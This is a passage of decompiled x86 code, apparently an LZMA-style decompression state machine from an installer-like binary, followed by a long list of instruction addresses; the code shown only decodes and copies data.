				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405f92
0x00405f99
0x00405f9f
0x00405fa5
0x00000000
0x00405fa9
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcb
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe0
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602b
0x0040602e
0x00406056
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406030
0x00406034
0x00406039
0x00406039
0x00406042
0x00406048
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x0040609f
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a4
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c1
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406107
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067af
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067e5
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067ee
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x0040680d
0x0040680d
0x00406810
0x00406813
0x00406813
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x004061a1
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
